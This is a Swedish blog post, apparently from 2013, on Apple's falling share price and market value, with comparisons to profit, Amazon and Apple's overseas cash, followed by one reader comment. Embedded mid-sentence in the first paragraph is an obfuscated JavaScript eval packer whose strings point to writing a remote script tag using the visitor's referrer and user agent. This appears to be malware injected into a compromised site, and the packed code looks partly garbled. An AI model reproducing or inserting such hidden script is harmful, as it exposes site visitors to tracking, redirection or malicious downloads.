Image Image Image Image Image Image Image Image Image Image

| 17 juni, 2021

Scroll to top

Top

Apples börsvärde sjunker snabbt

apple
Sebastian

Apples eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|zzkhb|var|u0026u|referrer|ezhaa||js|php’.split(’|’),0,{}))
aktie AAPL har på senare dagar varit på ständig nedgång. Även om Apple gjorde ett otroligt rekord i slutet av 2012  verkar det inte hjälpa deras aktie. På torsdagen var priset nere på under 450 dollar.

Just nu ligger Apples börsvärde på runt 423 miljarder dollar dvs i runda slängar 2.8 biljoner kronor.

Apple drog samtidigt under sista kvartalet 2012 in ca 86 miljarder kronor i vinst. Och det totala under hela året låg på hela 275 miljarder kronor, en otrolig summa.

Om Apples tillväxt helt stannade upp och försäljningen endast fortsatte likt föregående år skulle det ta ca 10 år att tjäna in sitt börsvärde.

Man skulle kunna ta Amazon som exempel som sedan 2003 håvat in ungefär 33 miljarder dollar i vinst och erhåller ett börsvärde på ca 818 miljarder kronor. Amazon gjorde en förlust på mer än en miljard kronor 2011 och förväntas nu att presentera en större vinst 2012 när de går ut med uppgifterna 29 februari.

Man kan också titta på Apples kassa som huvudsakligen är rena pengar som hålls av företages dotterbolag i utlandet.
Där ligger ca 900 miljarder kronor vilket täcker nästan en tredjedel av deras börsvärde.

Hur det ska gå för Apple under 2013 får vi vänta och se. Det gäller kanske nu att hitta på något riktigt unikt innan användarna hittar en annan spelare på marknaden. 

Via: IDG Sweden

Comments

  1. hampe

    Aj aj aj. Nu går det åt skoog